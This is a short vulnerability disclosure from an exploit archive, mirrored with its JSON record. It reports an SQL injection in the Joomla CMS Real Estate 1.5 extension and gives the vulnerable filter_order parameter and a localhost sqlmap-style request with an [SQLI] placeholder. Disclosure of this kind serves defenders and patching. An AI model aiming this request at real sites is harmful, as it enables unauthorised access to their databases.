Search...

Joomla CMS Real Estate 1.5 SQL Injection

2018-01-06T00:00:00

ID PACKETSTORM:145697
Type packetstorm
Reporter Bilal Kardadou
Modified 2018-01-06T00:00:00

Description

                                        
                                            `################################################  
#Title: Joomla! CMS Real Estate 1.5 - SQL injection  
#Credit: Bilal KARDADOU  
#Vendor: http://www.cms-realestate.com  
#URL:  
https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/cms-real-estate/  
#Product: 'Joomla! CMS Real Estate 1.5 - SQL injection'  
#Developer: JoomlaUX  
#Extension type: Plugin  
#Last updated: Nov 08 2017  
#Compatibility: 3.X  
#Type: Paid download  
#Google Dork: N/A  
################################################  
#  
# Description:  
# Real Estate Agency component for Joomla! 3.x versions.  
#  
#  
# --Method=GET -p [filter_order]  
#  
# -u "  
http://127.0.0.1/index.php?option=com_nbreal&view=properties&layout=global&filter_order=[SQLI]&filter_order_Dir=&bigsearch=A+quiet+family+home+with+private+garden+area+in+a+cul-de-sac+near+the+pool+-+Three-bedroom+Villa&n_bedrooms=5&n_bathrooms=8  
"  
#  
# PoC:  
# https://prnt.sc/hwdajq  
#  
#  
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)  
################################################  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:145697", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla CMS Real Estate 1.5 SQL Injection", "description": "", "published": "2018-01-06T00:00:00", "modified": "2018-01-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/145697/Joomla-CMS-Real-Estate-1.5-SQL-Injection.html", "reporter": "Bilal Kardadou", "references": [], "cvelist": [], "lastseen": "2018-01-07T00:33:40", "viewCount": 14, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-01-07T00:33:40", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-07T00:33:40", "rev": 2}, "vulnersScore": 0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/145697/joomlacmsrealestate15-sql.txt", "sourceData": "`################################################ \n#Title: Joomla! CMS Real Estate 1.5 - SQL injection \n#Credit: Bilal KARDADOU \n#Vendor: http://www.cms-realestate.com \n#URL: \nhttps://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/cms-real-estate/ \n#Product: 'Joomla! CMS Real Estate 1.5 - SQL injection' \n#Developer: JoomlaUX \n#Extension type: Plugin \n#Last updated: Nov 08 2017 \n#Compatibility: 3.X \n#Type: Paid download \n#Google Dork: N/A \n################################################ \n# \n# Description: \n# Real Estate Agency component for Joomla! 3.x versions. \n# \n# \n# --Method=GET -p [filter_order] \n# \n# -u \" \nhttp://127.0.0.1/index.php?option=com_nbreal&view=properties&layout=global&filter_order=[SQLI]&filter_order_Dir=&bigsearch=A+quiet+family+home+with+private+garden+area+in+a+cul-de-sac+near+the+pool+-+Three-bedroom+Villa&n_bedrooms=5&n_bathrooms=8 \n\" \n# \n# PoC: \n# https://prnt.sc/hwdajq \n# \n# \n# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) \n################################################ \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}}